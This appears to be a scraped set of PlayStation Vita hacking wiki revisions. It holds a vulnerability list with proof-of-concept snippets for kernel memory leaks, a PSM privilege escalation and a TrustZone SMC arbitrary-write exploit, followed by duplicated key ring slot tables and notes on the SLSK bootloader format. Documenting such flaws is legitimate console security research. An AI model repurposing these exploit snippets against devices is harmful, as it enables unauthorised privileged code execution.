=== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ===<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) ===<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
https://blog.xyz.is/2016/webkit-360.html<br />
<br />
=== PSM Mono privilege escalation ===<br />
<br />
https://yifan.lu/2015/06/21/hacking-the-ps-vita/<br />
<br />
=== PSM Unity privilege escalation ===<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
=== PSM NetworkRequest privilege escalation ===<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== h-encore savedata exploit ===<br />
<br />
To be disclosed by TheFloW.<br />
<br />
Discovered on 2018-02-17. Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patched yet).<br />
<br />
=== h-encore userland ASLR bypass ===<br />
<br />
To be disclosed by TheFloW.<br />
<br />
Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patched yet).<br />
<br />
== System ==<br />
<br />
== Kernel ==<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
(2014-09-16)<br />
<pre><br />
might have found one<br />
SceSblDmac5Mgr_sceSblDmac5EncDec<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernel<br />
R10 comes from orginal read in buffer+0x10<br />
bad news is it got patched in 1.80<br />
they also added a isShell check<br />
</pre><br />
<br />
'''Consensus''': Confirmed exploitable before 1.80. YEAH!<br />
<br />
=== sceIoDevctl does not clear stack buffer ===<br />
(2014-11-24)<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls)<br />
Then call devctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="c"><br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, WINDOW_BASE+0x10, 0x3FF);<br />
store(RET, WINDOW_BASE+0x4);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Syscall handler doesn't check syscall number ===<br />
<br />
(2015-07-03) A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
This was patched in 1.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
(2016-04-05) sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap. However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore. Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<pre><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</pre><br />
<br />
Fixed in 3.63.<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
2 still to be disclosed by TheFloW.<br />
<br />
Patched on 3.68.<br />
<br />
==== kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
=== h-encore kernel exploit ===<br />
<br />
Discovered on 2018-02-03. Released on 2018-06-29.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user. [https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
(2017-04-30) A logic flaw related to error code propagation in NSBL allows for a buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
It was patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
=== SMC 0x12F does not validate arguments -> TrustZone level arbitrary code execution ===<br />
<br />
(2017-01-01) SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table).<br />
<br />
This results in TrustZone level arbitrary code execution.<br />
<br />
It was patched somewhere around after 1.80 before 2.10.<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [https://pastebin.com/59pe8jBg there].<br />
<br />
Example code exploiting this vulnerability:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %0\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
== Hardware ==<br />
<br />
=== Crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) To be disclosed.<br />
<br />
https://twitter.com/pomfpomfpomf3/status/832806488221446145<br />
<br />
<pre><br />
octopus exploit<br />
<br />
.---. ,,<br />
,, / \ ;,,'<br />
;, ; ( o o ) ; ;<br />
;,';,,, \ \/ / ,; ;<br />
,,, ;,,,,;;,` '-,;'''',,,'<br />
;,, ;,, ,,,, ,; ,,,'';;,,;''';<br />
;,,,; ~~' '';,,''',,;'''' <br />
</pre><br />
<br />
(I copied the octopus from an ASCII art page: http://ascii.co.uk/art/octopus)<br />
<br />
=== To be disclosed ===<br />
<br />
(2017-02-23) To be disclosed.<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) Because We Know Real French Words(TM)<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Cmep_Key_Ring_Base&diff=9834Cmep Key Ring Base2018-08-09T19:58:59Z<p>Xyz: /* Key Ring Slots 0xE0058000 */</p>
<hr />
<div>Address = 0xE0058000 + 32 * Slot<br />
<br />
=== Permission bits ===<br />
{| class="wikitable"<br />
|-<br />
! Bit !! Function<br />
|-<br />
| 0x01 || accessible for bigmac encrypt<br />
|-<br />
| 0x02 || accessible for bigmac decrypt<br />
|-<br />
| 0x10 || ?<br />
|-<br />
| 0x20 || crypto operation supports a keyslot dst<br />
|-<br />
| 0x80 || related to bootrom functionality. If set then permissions for this slot can be reset<br />
|-<br />
| 0x400 || dst can be memory<br />
|-<br />
| 0x800 || can be written directly by f00d (?)<br />
|-<br />
| 0x1000 || can be read directly by f00d<br />
|}<br />
<br />
=== Key Ring Slots 0xE0058000 ===<br />
<br />
{| class="wikitable"<br />
|-<br />
! Slot !! Mode !! Protection !! Per-console !! Description<br />
|-<br />
| 0 || 3 || 0x0442 || ? || ?<br />
|-<br />
| 1 || 1 || 0x0442 || ? || ?<br />
|-<br />
| 2-7 || 1 || 0x0040 || ? || ?<br />
|-<br />
| 8 || 3 || 0x0081 || Yes. || enp per-console key<br />
|-<br />
| 9 || 1 || 0x0080 || ? || ?<br />
|-<br />
| 0xA-0xF || 3 || 0x0080 || ? || ?<br />
|-<br />
| 0x10 || 1 || 0x0502 || ? || supports decryption only<br />
|-<br />
| 0x11-0x1F || 1 || 0x0100 || ? || ?<br />
|-<br />
| 0x20 || 3 || 0x0200 || ? || Derived from 0x344, used for hmac-sha256 over enc files<br />
|-<br />
| 0x21-0x24 || 1 || 0x061F || ? || supports encryption and decryption<br />
|-<br />
| 0x25-0x2F || 1 || 0x0200 || ? || ?<br />
|-<br />
| 0x30-0x34 || 1 || 0x041F || ? || ?<br />
|-<br />
| 0x35-0x7F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x80-0xFF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x100 || 1 || 0x041F || ? || ?<br />
|-<br />
| 0x101-0x17F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x180-0x1FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x200-0x203 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x204-0x205 || 3 || 0x006F || ? || ?<br />
|-<br />
| 0x206 || 3 || 0x00A0 || ? || Used to derive key used to decrypt personalized layer over enc. Should be per-console.<br />
|-<br />
| 0x207 || 3 || 0x00A0 || ? || Used instead of the above key when secret debug mode is set. (Possibly non-per-console?)<br />
|-<br />
| 0x208-0x20D || 3 || 0x00A0 || ? || 6 keys used to decrypt enc metadata, which one is used depends on key revision in enc header<br />
|-<br />
| 0x20E-0x20F || 3 || 0x0010 || ? || Maybe per-console emmc crypto keys? Protected by second_loader.<br />
|-<br />
| 0x210-0x211 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x212 || 3|| 0x001F || ? || ?<br />
|-<br />
| 0x213 || 3|| 0x001F || ? || Used to derive SMI keys, which are used for factory fw decryption. Per-console.<br />
|-<br />
| 0x214 || 3|| 0x0000 || ? || Used to derive keyslots 0x514, 0x515 in second_loader<br />
|-<br />
| 0x215 || 3|| 0x0000 || ? || ?<br />
|-<br />
| 0x216 || 3|| 0x001F || ? || Derive 0x502-0x504 by encrypting data in second_loader.<br />
|-<br />
| 0x217 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x218-0x2FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x300-0x33F || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x340 || 3 || 0x012F || ? || Used to decrypt keys into the 0x10 key slot<br />
|-<br />
| 0x341-0x343 || 3 || 0x0120 || ? || ?<br />
|-<br />
| 0x344 || 3 || 0x0220 || ? || Used to derive key 0x20 in brom.<br />
|-<br />
| 0x345-0x348 || 3 || 0x022F || ? || Used to decrypt keys into one of the 0x21-0x24 key slot<br />
|-<br />
| 0x349-0x353 || 3 || 0x0220 || ? || ?<br />
|-<br />
| 0x354-0x3FF || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x400-0x47F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x480-0x4FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x500 || 1 || 0x1800 || ? || ?<br />
|-<br />
| 0x501 || 7 || 0x1000 || No || Used by bootrom first_loader to figure out whether to load from eMMC or ARM comms after reset<br />
|-<br />
| 0x502-0x504 || 3 || 0x1800 || Yes || Related to Ernie SNVS<br />
|-<br />
| 0x505 || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x506 || 3 || 0x1800 || ? || ?<br />
|-<br />
| 0x507 || 3 || 0x1800 || No || ?<br />
|-<br />
| 0x508 || 3 || 0x1800 || No || Ernie HW version (from syscon cmd 0x1). Set to 0x100060D on 1.692, 0x100010A on 1.05, 0x0100010B on 1.50<br />
|-<br />
| 0x509 || 3 || 0x1800 || Yes || IDPS of unit (console id)<br />
|-<br />
| 0x50A || 3 || 0x1800 || ? || Byte15bit0,byte14bit0,byte14bit1,byte11bit4: Revocation related. Byte13bit0: Enable F00D debug prints.<br />
|-<br />
| 0x50B || 3 || 0x1800 || ? || From 0xD2 SNVS block 0, 8 bytes<br />
|-<br />
| 0x50C || 3 || 0x1800 || No || Flags. Set to 1 on 1.692 and newer, 0 on older<br />
|-<br />
| 0x50D || 3 || 0x1800 || Yes || OpenPSID<br />
|-<br />
| 0x50E || 3 || 0x1800 || Yes || Current firmware version. Comes from SNVS.<br />
|-<br />
| 0x50F || 3 || 0x1800 || Yes || Factory firmware version. Comes from idstorage.<br />
|-<br />
| 0x510 || 3 || 0x1800 || Yes || Some bit flags, comes from syscon cmd 0x90 offset 0xE0<br />
|-<br />
| 0x511 || 3 || 0x1800 || Yes || Unique per boot session id, Syscon shared 0xD0 session key<br />
|-<br />
| 0x512 || 7 || 0x1800 || Yes || Tick count? Used in Syscon encrypted communication. Set to a random value when session key is set.<br />
|-<br />
| 0x513 || 3 || 0x1800 || No || DRAM size. Set to 0x20000000 on retail, 0x40000000 on devkit.<br />
|-<br />
| 0x514 || 3 || 0x1800 || No? || F00d-cmd F01 AES-256-CMAC key. Protected on 1.05.<br />
|-<br />
| 0x515 || 3 || 0x1800 || No? || F00d-cmd F01 AES-256-CBC key. Protected on 1.05.<br />
|-<br />
| 0x516 || 3 || 0x1800 || ? || F00d-cmd F01 writes (u32)1 here when exporting the infoblk. Next time main() executes this flag is cleared.<br />
|-<br />
| 0x517 || 3 || 0x1800 || || When initializing the EEPROM, this is zeroed if 0x50D has bit8 clear (on 1.692).<br />
|-<br />
| 0x518 || 3 || 0x1800 || No || Another current FW version (3.60+?) Comes from SNVS.<br />
|-<br />
| 0x519 || 3 || 0x1800 || No || 00s<br />
|-<br />
| 0x51A || 3 || 0x1800 || Yes || Randomized 0x20 byte key unique every boot/reboot/resume used for kernel coredump encryption<br />
|-<br />
| 0x51B || 3 || 0x1800 || No || Some kind of model info 0x406000 on retail and 0x416000 on devkit, obtained from syscon command 5<br />
|-<br />
| 0x51C-0x57F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x580-0x5FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x600 || 3 || 0x1000 || Yes || <code>aimgr_sm.self</code> cmd 0x3 return, VisibleId/FuseId<br />
|-<br />
| 0x601 || 3 || 0x1000 || Yes || ?<br />
|-<br />
| 0x602 || 3 || 0x1000 || Yes || ?<br />
|-<br />
| 0x603 || 3 || 0x1000 || No || ?<br />
|-<br />
| 0x604 || 3 || 0x1000 || No || ?<br />
|-<br />
| 0x605-0x607 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x608-0x6FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x700-0x77F || 3 || 0x0000 || ? || 16 public RSA keys for enc, which one is used depends on public key revision from enc header.<br />
|-<br />
| 0x780-0x7FF || 3 || 0x0000 || ? || ?<br />
|}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Cmep_Key_Ring_Base&diff=9833Cmep Key Ring Base2018-08-03T19:27:58Z<p>Xyz: /* Key Ring Slots 0xE0058000 */</p>
<hr />
<div>Address = 0xE0058000 + 32 * Slot<br />
<br />
=== Permission bits ===<br />
{| class="wikitable"<br />
|-<br />
! Bit !! Function<br />
|-<br />
| 0x01 || accessible for bigmac encrypt<br />
|-<br />
| 0x02 || accessible for bigmac decrypt<br />
|-<br />
| 0x10 || ?<br />
|-<br />
| 0x20 || crypto operation supports a keyslot dst<br />
|-<br />
| 0x80 || related to bootrom functionality. If set then permissions for this slot can be reset<br />
|-<br />
| 0x400 || dst can be memory<br />
|-<br />
| 0x800 || can be written directly by f00d (?)<br />
|-<br />
| 0x1000 || can be read directly by f00d<br />
|}<br />
<br />
=== Key Ring Slots 0xE0058000 ===<br />
<br />
{| class="wikitable"<br />
|-<br />
! Slot !! Mode !! Protection !! Per-console !! Description<br />
|-<br />
| 0 || 3 || 0x0442 || ? || ?<br />
|-<br />
| 1 || 1 || 0x0442 || ? || ?<br />
|-<br />
| 2-7 || 1 || 0x0040 || ? || ?<br />
|-<br />
| 8 || 3 || 0x0081 || Yes. || enp per-console key<br />
|-<br />
| 9 || 1 || 0x0080 || ? || ?<br />
|-<br />
| 0xA-0xF || 3 || 0x0080 || ? || ?<br />
|-<br />
| 0x10 || 1 || 0x0502 || ? || supports decryption only<br />
|-<br />
| 0x11-0x1F || 1 || 0x0100 || ? || ?<br />
|-<br />
| 0x20 || 3 || 0x0200 || ? || Derived from 0x344, used for hmac-sha256 over enc files<br />
|-<br />
| 0x21-0x24 || 1 || 0x061F || ? || supports encryption and decryption<br />
|-<br />
| 0x25-0x2F || 1 || 0x0200 || ? || ?<br />
|-<br />
| 0x30-0x34 || 1 || 0x041F || ? || ?<br />
|-<br />
| 0x35-0x7F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x80-0xFF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x100 || 1 || 0x041F || ? || ?<br />
|-<br />
| 0x101-0x17F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x180-0x1FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x200-0x203 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x204-0x205 || 3 || 0x006F || ? || ?<br />
|-<br />
| 0x206 || 3 || 0x00A0 || ? || Used to derive key used to decrypt personalized layer over enc. Should be per-console.<br />
|-<br />
| 0x207 || 3 || 0x00A0 || ? || Used instead of the above key when secret debug mode is set. (Possibly non-per-console?)<br />
|-<br />
| 0x208-0x20D || 3 || 0x00A0 || ? || 6 keys used to decrypt enc metadata, which one is used depends on key revision in enc header<br />
|-<br />
| 0x20E-0x20F || 3 || 0x0010 || ? || Maybe per-console emmc crypto keys? Protected by second_loader.<br />
|-<br />
| 0x210-0x211 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x212 || 3|| 0x001F || ? || ?<br />
|-<br />
| 0x213 || 3|| 0x001F || ? || Used to derive SMI keys, which are used for factory fw decryption. Per-console.<br />
|-<br />
| 0x214 || 3|| 0x0000 || ? || Used to derive keyslots 0x514, 0x515 in second_loader<br />
|-<br />
| 0x215 || 3|| 0x0000 || ? || ?<br />
|-<br />
| 0x216 || 3|| 0x001F || ? || Derive 0x502-0x504 by encrypting data in second_loader.<br />
|-<br />
| 0x217 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x218-0x2FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x300-0x33F || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x340 || 3 || 0x012F || ? || Used to decrypt keys into the 0x10 key slot<br />
|-<br />
| 0x341-0x343 || 3 || 0x0120 || ? || ?<br />
|-<br />
| 0x344 || 3 || 0x0220 || ? || Used to derive key 0x20 in brom.<br />
|-<br />
| 0x345-0x348 || 3 || 0x022F || ? || Used to decrypt keys into one of the 0x21-0x24 key slot<br />
|-<br />
| 0x349-0x353 || 3 || 0x0220 || ? || ?<br />
|-<br />
| 0x354-0x3FF || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x400-0x47F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x480-0x4FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x500 || 1 || 0x1800 || ? || ?<br />
|-<br />
| 0x501 || 7 || 0x1000 || ? || Downgrade protection? Set to 4 on 1.692, 0 on 1.05.<br />
|-<br />
| 0x502-0x504 || 3 || 0x1800 || Yes || Related to Ernie SNVS<br />
|-<br />
| 0x505 || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x506 || 3 || 0x1800 || ? || ?<br />
|-<br />
| 0x507 || 3 || 0x1800 || No || ?<br />
|-<br />
| 0x508 || 3 || 0x1800 || No || Ernie HW version (from syscon cmd 0x1). Set to 0x100060D on 1.692, 0x100010A on 1.05, 0x0100010B on 1.50<br />
|-<br />
| 0x509 || 3 || 0x1800 || Yes || IDPS of unit (console id)<br />
|-<br />
| 0x50A || 3 || 0x1800 || ? || Byte15bit0,byte14bit0,byte14bit1,byte11bit4: Revocation related. Byte13bit0: Enable F00D debug prints.<br />
|-<br />
| 0x50B || 3 || 0x1800 || ? || From 0xD2 SNVS block 0, 8 bytes<br />
|-<br />
| 0x50C || 3 || 0x1800 || No || Flags. Set to 1 on 1.692 and newer, 0 on older<br />
|-<br />
| 0x50D || 3 || 0x1800 || Yes || OpenPSID<br />
|-<br />
| 0x50E || 3 || 0x1800 || Yes || Current firmware version. Comes from SNVS.<br />
|-<br />
| 0x50F || 3 || 0x1800 || Yes || Factory firmware version. Comes from idstorage.<br />
|-<br />
| 0x510 || 3 || 0x1800 || Yes || Some bit flags, comes from syscon cmd 0x90 offset 0xE0<br />
|-<br />
| 0x511 || 3 || 0x1800 || Yes || Unique per boot session id, Syscon shared 0xD0 session key<br />
|-<br />
| 0x512 || 7 || 0x1800 || Yes || Tick count? Used in Syscon encrypted communication. Set to a random value when session key is set.<br />
|-<br />
| 0x513 || 3 || 0x1800 || No || DRAM size. Set to 0x20000000 on retail, 0x40000000 on devkit.<br />
|-<br />
| 0x514 || 3 || 0x1800 || No? || F00d-cmd F01 AES-256-CMAC key. Protected on 1.05.<br />
|-<br />
| 0x515 || 3 || 0x1800 || No? || F00d-cmd F01 AES-256-CBC key. Protected on 1.05.<br />
|-<br />
| 0x516 || 3 || 0x1800 || ? || F00d-cmd F01 writes (u32)1 here when exporting the infoblk. Next time main() executes this flag is cleared.<br />
|-<br />
| 0x517 || 3 || 0x1800 || || When initializing the EEPROM, this is zeroed if 0x50D has bit8 clear (on 1.692).<br />
|-<br />
| 0x518 || 3 || 0x1800 || No || Another current FW version (3.60+?) Comes from SNVS.<br />
|-<br />
| 0x519 || 3 || 0x1800 || No || 00s<br />
|-<br />
| 0x51A || 3 || 0x1800 || Yes || Randomized 0x20 byte key unique every boot/reboot/resume used for kernel coredump encryption<br />
|-<br />
| 0x51B || 3 || 0x1800 || No || Some kind of model info 0x406000 on retail and 0x416000 on devkit, obtained from syscon command 5<br />
|-<br />
| 0x51C-0x57F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x580-0x5FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x600 || 3 || 0x1000 || Yes || <code>aimgr_sm.self</code> cmd 0x3 return, VisibleId/FuseId<br />
|-<br />
| 0x601 || 3 || 0x1000 || Yes || ?<br />
|-<br />
| 0x602 || 3 || 0x1000 || Yes || ?<br />
|-<br />
| 0x603 || 3 || 0x1000 || No || ?<br />
|-<br />
| 0x604 || 3 || 0x1000 || No || ?<br />
|-<br />
| 0x605-0x607 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x608-0x6FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x700-0x77F || 3 || 0x0000 || ? || 16 public RSA keys for enc, which one is used depends on public key revision from enc header.<br />
|-<br />
| 0x780-0x7FF || 3 || 0x0000 || ? || ?<br />
|}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=SLSK&diff=9521SLSK2018-07-30T00:41:49Z<p>Xyz: /* Signature */</p>
<hr />
<div><br />
{| class="wikitable"<br />
|-<br />
! Offset !! Size !! Description<br />
|-<br />
| 0x0 || 0x4 || <code>0x64B2C8E5</code> magic<br />
|-<br />
| 0x4 || 0x4 || Offset to code<br />
|-<br />
| 0x8 || 0x4 || Size of plaintext version string, 0 on 0.931, 0x10 on other<br />
|-<br />
| 0xC || 0x4 || Size of unknown block, only seen as 0<br />
|-<br />
| 0x10 || 0x4 || Code size<br />
|-<br />
| 0x14 || 0x2 || AES key revision, possible values 0 to 5<br />
|-<br />
| 0x16 || 0x2 || Public key revision, possible values 0 to 15<br />
|-<br />
| 0x18 || 0x8 || Unknown/zero<br />
|-<br />
| 0x20 || 0x20 || sha256 hash of decrypted body<br />
|-<br />
| 0x40 || 0x10 || Version in ASCII, not present on 0.931<br />
|-<br />
| 0x50 (0x40 on 0.931) || 0x90 || Zero<br />
|-<br />
| 0xE0 (0xD0 on 0.931) || Until Data || Encrypted Header<br />
|-<br />
|}<br />
<br />
== Encrypted Header ==<br />
<br />
At offset 0xE0 there is a 0x1E0 sized buffer that is speculated to be an encrypted header. For any given firmware version, secure_kernel.enc/second_loader.enc and secure_kernel.enp/second_loader.enp share the first 0xC0 bytes. For non-retail PUPs, each SLSK share the first 0xC0 bytes as observed in 0.931, 0.995, 1.000.41. Similarly in retail PUPs, each SLSK also share the first 0xC0 bytes as observed in 1.05 and 3.60. However, the bytes differ from retail and non-retail SLSK.<br />
<br />
There is likely a 0xC0 sized "common" header that is shared by every firmware and by both secure_kernel and second_loader but different between retail and non-retail builds. Then there is likely a 0x20 byte section that is unique per SLSK (maybe contains version, size, load offset, etc). Then a 0x100 byte RSA-2048 signature of the header.<br />
<br />
== Signature ==<br />
<br />
The last 0x340 bytes of each SLSK is not personalized. For both secure_kernel and second_loader, both the enc and enp variants share the last 0x340 bytes (although they differ from each other and across firmwares). This is likely the signature and might also contain certificates.<br />
<br />
Reading through brom code, it appears last 0x340 bytes are not used in any way.<br />
<br />
== Bootrom enc loading process ==<br />
<br />
=== Remove personalization ===<br />
<br />
First, personalization layer is removed. It uses AES-128-CBC with a derived key and decrypts data at ENC+0xE0 (or ENC+0xD0 if there's no plaintext version) for size of code_size+0x1E0.<br />
<br />
There are two possible paths to derive the key used to remove personalization. Normally, the key is derived using keyslot 0x206. There's however an alternative path, triggered in secret debug mode, when instead the keyslot 0x207 is used with a different seed.<br />
<br />
Once personalization is removed, the source keys are locked down. Keyslots 0x9, 0x206, 0x207 are locked down completely (leaving only 0xA0 protection). However, keyslot 0x8 allows encryption, this lets update manager SM add personalization layer during update without having to derive the keys itself.<br />
<br />
=== Header RSA check ===<br />
<br />
A key is derived from keyslot 0x344 and put into keyslot 0x20. This key is then immediately used to calculate HMAC-SHA256 over enc header, excluding the RSA sig (typically 0x00 to 0x1C0).<br />
<br />
2 bytes are read from keyring slot 0x603 is read. This is the bitmask of allowed RSA public keys (0xFFFF on 1.692). If the mask is zero, a hardcoded RSA modulus is used. Otherwise, it checks enc rsa revision against the mask and if it's allowed, it gets the modulus from keyring RSA storage starting at keyslot 0x700.<br />
<br />
The signature is typically located at 0x1C0 and is 0x100 bytes. After calculating powmod, it checks the padding and compares previously calculated HMAC-SHA256 against the contents.<br />
<br />
Finally, it protects keyslots 0x700 to 0x77F to disable f00d reading out the modulus. However, only reading is protected, it should still be possible to encrypt/decrypt using these keyslots.<br />
<br />
=== Metadata decryption and code verification ===<br />
<br />
